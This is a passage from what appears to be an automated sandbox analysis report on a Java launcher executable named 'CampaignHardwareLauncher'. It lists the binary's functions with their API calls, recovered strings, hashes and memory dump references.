                                                                                                                                                                                                                                                                                                                • Instruction ID: aea4bb79273e8d534990c21f24d6dc2711a2c6fda4608cbe9aad56ecb48cfa11
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79cba90a5c32919940d47014e4f11db2286ddd08fea7034ebff4aa08fe6649a9
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9001677060430597CB00BF75D58521B76E0AB84348F01C83ED5857B381D778DC25CB9A
                                                                                                                                                                                                                                                                                                                Function 00401DD0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: AddressCurrentHandleModuleProcProcessfprintf
                                                                                                                                                                                                                                                                                                                • String ID: IsWow64Process$WOW64:%s$yes
                                                                                                                                                                                                                                                                                                                • API String ID: 24026888-2072328098
                                                                                                                                                                                                                                                                                                                • Opcode ID: 0f449fa4e61134affe168ec5c855c7a0e9b7151d64be7ae9747b5a4d41c4c0fd
                                                                                                                                                                                                                                                                                                                • Instruction ID: a217be7bda152947c960663f56388daf3a3792abde6a83131336f65876ccd3cc
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f449fa4e61134affe168ec5c855c7a0e9b7151d64be7ae9747b5a4d41c4c0fd
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 52F03170A0830597DB00BF75D58511F7AE4AB84348F01C83ED985AB3D6EB78DC249B9A
                                                                                                                                                                                                                                                                                                                Function 00405CDC Relevance: 12.0, APIs: 6, Strings: 2, Instructions: 45stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • --l4j-, xrefs: 00405C50, 00405C8E
                                                                                                                                                                                                                                                                                                                • -Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd, xrefs: 00405CAE, 00405CCA
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strstr$ErrorLaststrcatstrchrstrcpystrlen
                                                                                                                                                                                                                                                                                                                • String ID: --l4j-$-Dfile.encoding=UTF-8 -classpath "ddfrt658\.;ddfrt658\..;ddfrt658\asm-all.jar;ddfrt658\dn-compiled-module.jar;ddfrt658\dn-php-sdk.jar;ddfrt658\gson.jar;ddfrt658\jfoenix.jar;ddfrt658\jphp-app-framework.jar;ddfrt658\jphp-core.jar;ddfrt658\jphp-desktop-ext.jar;dd
                                                                                                                                                                                                                                                                                                                • API String ID: 1304447673-1328920229
                                                                                                                                                                                                                                                                                                                • Opcode ID: d165a1be7fc4b68c02de8a7e451452b4915db2d7301cae9c236fcca6c72a7ef8
                                                                                                                                                                                                                                                                                                                • Instruction ID: 56afbf9f269423abcfbc407513a566e97e7e4f5f61a7ec7fa9ea9c2cf9926f11
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d165a1be7fc4b68c02de8a7e451452b4915db2d7301cae9c236fcca6c72a7ef8
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 950109745087109AE710AF65C44436BBAE1EF44304F45887FD589B73C2D77D88518B8A
                                                                                                                                                                                                                                                                                                                Function 004019E0 Relevance: 10.6, APIs: 7, Instructions: 74timewindowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: KillMessagePostQuitTimer$CodeEnumExitProcessShowWindowWindows
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1905518172-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: ed7f04139cc10e99910bf818abc7fe4566fa36b293454e2dcc1566a67e520c2f
                                                                                                                                                                                                                                                                                                                • Instruction ID: 4aa06db3ae75fa459c5dc857b340d842a3fba66811b007700aa9ab28a47e10bc
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed7f04139cc10e99910bf818abc7fe4566fa36b293454e2dcc1566a67e520c2f
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75216F71B053048BC714EF39EA4571A77E1AB80348F00853EE885A73A0D739E915DB9B
                                                                                                                                                                                                                                                                                                                Function 004020C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Resource$ErrorFindLastLoadLockfprintf
                                                                                                                                                                                                                                                                                                                • String ID: Resource %d:%s
                                                                                                                                                                                                                                                                                                                • API String ID: 2300709556-3770364717
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5fdb7a8abfa6b102f5a50e062b281fc94a6f536b858fcc5aa029184cd9954bbf
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7b4c6ba3150bb0ca76113f71d5647f24083859b2f22289e308b5470f49ef36ec
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fdb7a8abfa6b102f5a50e062b281fc94a6f536b858fcc5aa029184cd9954bbf
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D321C570A083018BDB00FF39DA8035ABBE4EF44344F00847FE989EB381D278D8558B86
                                                                                                                                                                                                                                                                                                                Function 00403659 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • Heap %s:Requested %d MB / %d%%, Available: %d MB, Heap size: %d MB, xrefs: 00403688
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strlen$_itoafprintfstrcat
                                                                                                                                                                                                                                                                                                                • String ID: Heap %s:Requested %d MB / %d%%, Available: %d MB, Heap size: %d MB
                                                                                                                                                                                                                                                                                                                • API String ID: 309510014-1709647519
                                                                                                                                                                                                                                                                                                                • Opcode ID: 4c106ecc713cc839283f90cd6b49804e0ebd0d678dfbdb3f99c2325a0ba98a86
                                                                                                                                                                                                                                                                                                                • Instruction ID: e9b7ccf47b61d8f8975171a80ab5ecc25053be3e66329a59218f8502b43fd955
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c106ecc713cc839283f90cd6b49804e0ebd0d678dfbdb3f99c2325a0ba98a86
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B1115B59083059FCB04DF59C08129EFBF2FF88300F12882EE899AB351C7389855CB86
                                                                                                                                                                                                                                                                                                                Function 00401B87 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35stringfileCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: fopenmemsetstrlenstrncpy
                                                                                                                                                                                                                                                                                                                • String ID: j.lo$nch4
                                                                                                                                                                                                                                                                                                                • API String ID: 80595551-1605737849
                                                                                                                                                                                                                                                                                                                • Opcode ID: 70a3b17f3908ebedc0b3180f6b19ea0b43561d51c620d0b91f5d0ff4da68ae63
                                                                                                                                                                                                                                                                                                                • Instruction ID: 17a981617f60ab97fca732e22f92d21c70fcd95c49624fe496cb553d8773ac1f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70a3b17f3908ebedc0b3180f6b19ea0b43561d51c620d0b91f5d0ff4da68ae63
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0601E8B5D083049BC714AF25D48155AFBE0FF48314F42C86EA88D9B356D6389954CB96
                                                                                                                                                                                                                                                                                                                Function 00401000 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: signal
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1946981877-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: dc29bf9aea78ba53ae1806de999a580e3e5e4b6085ce782c554fd26ddb7216e3
                                                                                                                                                                                                                                                                                                                • Instruction ID: 1bbb52622e8a19badba6bad6b28e715f43f04d6c83c205b25cbd975ffaf7a7a3
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dc29bf9aea78ba53ae1806de999a580e3e5e4b6085ce782c554fd26ddb7216e3
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63312FB0A042408BD724AF69C58036EB6A0BF49354F16893FD9C5E77E1C6BECCD0974A
                                                                                                                                                                                                                                                                                                                Function 00405010 Relevance: 9.1, APIs: 6, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: EnvironmentVariablestrlen$memsetstrcat
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 2108680700-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: d95cb74e045f58805c42f9113675087c7de655c0657359ccab51889906dee4cd
                                                                                                                                                                                                                                                                                                                • Instruction ID: 19ba68cff2aee44dae23cc5b56ef49d50704ee26ecf9892f5ebb6658b324295f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d95cb74e045f58805c42f9113675087c7de655c0657359ccab51889906dee4cd
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D1119B5D087149BCB00EF69C54105DFBF1EF88314F1284BEE888A7355DA385A518BC6
                                                                                                                                                                                                                                                                                                                Function 00402620 Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 34stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strcatstrlen
                                                                                                                                                                                                                                                                                                                • String ID: bin\java.exe$bin\javaw.exe
                                                                                                                                                                                                                                                                                                                • API String ID: 1179760717-2770878578
                                                                                                                                                                                                                                                                                                                • Opcode ID: b65ea48d9e9f20d7926c5458ddd7f93f7f40326ce165c218aab041ff87f19a90
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7687c5f18350c46cbce8d6c5260ce5ab4989a23d013a9ddc911cfd2f41cc631c
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b65ea48d9e9f20d7926c5458ddd7f93f7f40326ce165c218aab041ff87f19a90
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01F062B4D183049EE710AF39D9C9A1ABBD4AF00308F46487EE4895F3D3D77A8450879A
                                                                                                                                                                                                                                                                                                                Function 004052DE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SetEnvironmentVariableA.KERNEL32 ref: 004052EC
                                                                                                                                                                                                                                                                                                                • strtok.MSVCRT(?,?,?,?,00406514), ref: 004052FF
                                                                                                                                                                                                                                                                                                                • strchr.MSVCRT ref: 00405316
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403100: memset.MSVCRT ref: 00403136
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403100: memset.MSVCRT ref: 00403151
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403100: strchr.MSVCRT ref: 0040316C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403100: strchr.MSVCRT ref: 0040318A
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403100: strncat.MSVCRT ref: 004031AF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403100: strncat.MSVCRT ref: 004031D5
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403100: strlen.MSVCRT ref: 004031EB
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403100: strstr.MSVCRT ref: 0040327E
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 0040535A
                                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00406514), ref: 00405373
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: strchr$memsetstrncat$EnvironmentErrorLastVariablefprintfstrlenstrstrstrtok
                                                                                                                                                                                                                                                                                                                • String ID: Set var:%s = %s
                                                                                                                                                                                                                                                                                                                • API String ID: 3263537496-1184643595
                                                                                                                                                                                                                                                                                                                • Opcode ID: ee98d8c8936dcdd218bc3ae6b4bee14f3b7f662cf54e9fc7437ca12448ec09f5
                                                                                                                                                                                                                                                                                                                • Instruction ID: b35ccef8a7e5673246ed472a237be416f5c44ba05b5604b2d57a73e62d97e0d5
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ee98d8c8936dcdd218bc3ae6b4bee14f3b7f662cf54e9fc7437ca12448ec09f5
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FA01DAB05087109EC701AF2AC58031EBFE4AF88744F41C87FE4C8AB381D77889519F9A
                                                                                                                                                                                                                                                                                                                Function 00401FCC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32stringwindowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(?,?,?,?,?,?,?,?,004013DA), ref: 00401FFD
                                                                                                                                                                                                                                                                                                                • strlen.MSVCRT ref: 0040201F
                                                                                                                                                                                                                                                                                                                • strcat.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013DA), ref: 00402040
                                                                                                                                                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004013DA), ref: 0040204B
                                                                                                                                                                                                                                                                                                                • fprintf.MSVCRT ref: 004020A9
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175139210.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_CampaignHardwareLauncher.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FormatFreeLocalMessagefprintfstrcatstrlen
                                                                                                                                                                                                                                                                                                                • String ID: An error occurred while starting the application.
                                                                                                                                                                                                                                                                                                                • API String ID: 863393273-2110520379
                                                                                                                                                                                                                                                                                                                • Opcode ID: 9e24085052815f66a929547d79b0b0ecebc814cf3094997c733abd0dc5bb07b1
                                                                                                                                                                                                                                                                                                                • Instruction ID: 48929c70c90143ab4f29c9b601d13be01fb97ec1997cc056402bd9998a5ef999
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e24085052815f66a929547d79b0b0ecebc814cf3094997c733abd0dc5bb07b1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 730116B0A083018BC300EF69C28025BBBF1BB84314F01886EE8C9A7245D77896548B8A
                                                                                                                                                                                                                                                                                                                Function 004012D0 Relevance: 7.6, APIs: 5, Instructions: 68stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 004012F4
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004020C0: FindResourceExA.KERNEL32(?,?,?,00401888), ref: 004020EF
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004020C0: LoadResource.KERNEL32 ref: 00402108
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004020C0: LockResource.KERNEL32 ref: 00402117
                                                                                                                                                                                                                                                                                                                • FindWindowExA.USER32 ref: 0040132A
                                                                                                                                                                                                                                                                                                                • GetWindowTextA.USER32 ref: 00401350
                                                                                                                                                                                                                                                                                                                • strstr.MSVCRT ref: 0040135F
                                                                                                                                                                                                                                                                                                                • FindWindowExA.USER32 ref: 0040137F
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000002.00000002.2174971130.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2174953691.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175021903.0000000000409000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000002.00000002.2175043766.0000000000412000.00000004.00000001.01000000.00000006.sdmpDownload File
